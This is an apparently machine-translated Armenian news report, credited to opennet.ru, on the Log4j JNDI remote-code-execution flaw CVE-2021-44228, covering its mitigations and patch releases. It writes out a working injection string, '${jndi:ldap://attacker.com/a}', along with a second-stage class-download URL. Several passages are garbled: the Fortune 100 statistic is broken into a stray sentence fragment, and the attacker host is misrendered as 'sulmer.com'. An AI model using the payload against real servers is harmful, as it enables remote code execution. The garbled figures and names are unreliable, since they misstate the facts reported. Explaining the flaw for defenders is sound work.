Apache Log4j-ում՝ Java հավելվածներում գրանցումը կազմակերպելու հանրաճանաչ շրջանակում, հայտնաբերվել է կարևոր խոցելիություն, որը թույլ է տալիս կամայական կոդ գործարկել, երբ «{jndi:URL}» ձևաչափով հատուկ ձևաչափված արժեք գրվում է մատյանում: Հարձակումը կարող է իրականացվել Java հավելվածների վրա, որոնք գրանցում են արտաքին աղբյուրներից ստացված արժեքները, օրինակ՝ սխալ հաղորդագրություններում խնդրահարույց արժեքներ ցուցադրելիս:
Նշվում է, որ գրեթե բոլոր նախագծերը, որոնք օգտագործում են շրջանակներ, ինչպիսիք են Apache Struts-ը, Apache Solr-ը, Apache Druid-ը կամ Apache Flink-ը, տուժում են խնդրից, ներառյալ Steam-ը, Apple iCloud-ը, Minecraft-ի հաճախորդները և սերվերները: Ակնկալվում է, որ խոցելիությունը կարող է հանգեցնել կորպորատիվ հավելվածների վրա զանգվածային հարձակումների ալիքի, որը կրկնում է կրիտիկական խոցելիության պատմությունը Apache Struts շրջանակում, որը, ըստ կոպիտ գնահատականի, օգտագործվում է վեբ հավելվածներում Fortune-ի 65%-ի կողմից: 100 ընկերություն, ներառյալ ցանցը խոցելի համակարգերի սկանավորման փորձերը:
Խնդիրն ավելի է սրվում նրանով, որ արդեն իսկ հրապարակվել է աշխատանքային շահագործում, սակայն կայուն ճյուղերի համար ամրագրումներ դեռևս չեն կազմվել։ CVE նույնացուցիչը դեռ չի նշանակվել: Ուղղումը ներառված է միայն log4j-2.15.0-rc1 թեստային ճյուղում: Որպես խոցելիության արգելափակման միջոց՝ խորհուրդ է տրվում log4j2.formatMsgNoLookups պարամետրը սահմանել true:
Խնդիրն առաջացել է նրանով, որ log4j-ն աջակցում է «{}» հատուկ դիմակների մշակումը գրանցամատյան դուրս եկած տողերում, որոնցում JNDI (Java Անվանման և տեղեկատուի միջերես) հարցումները կարող են կատարվել: Հարձակումը հանգում է նրան, որ տողը փոխանցվում է «${jndi:ldap://attacker.com/a}» փոխարինմամբ, որը մշակելուց հետո log4j-ը Java դասի ուղու LDAP հարցում կուղարկի sulmer.com սերվերին: . Հարձակվողի սերվերի կողմից վերադարձված ուղին (օրինակ՝ http://second-stage.attacker.com/Exploit.class) կբեռնվի և կկատարվի ընթացիկ գործընթացի համատեքստում, որը հարձակվողին թույլ է տալիս կամայական կոդ կատարել: համակարգ՝ ընթացիկ հավելվածի իրավունքներով։
Հավելված 1. Խոցելիությանը վերագրվել է CVE-2021-44228 նույնացուցիչը:
Հավելված 2. Հայտնաբերվել է թողարկման log4j-2.15.0-rc1-ով ավելացված պաշտպանությունը շրջանցելու միջոց: Առաջարկվել է նոր թարմացում՝ log4j-2.15.0-rc2՝ խոցելիությունից ավելի ամբողջական պաշտպանությամբ: Կոդն ընդգծում է փոփոխությունը, որը կապված է աննորմալ ավարտի բացակայության հետ՝ սխալ ձևաչափված JNDI URL-ի օգտագործման դեպքում:
Source: opennet.ru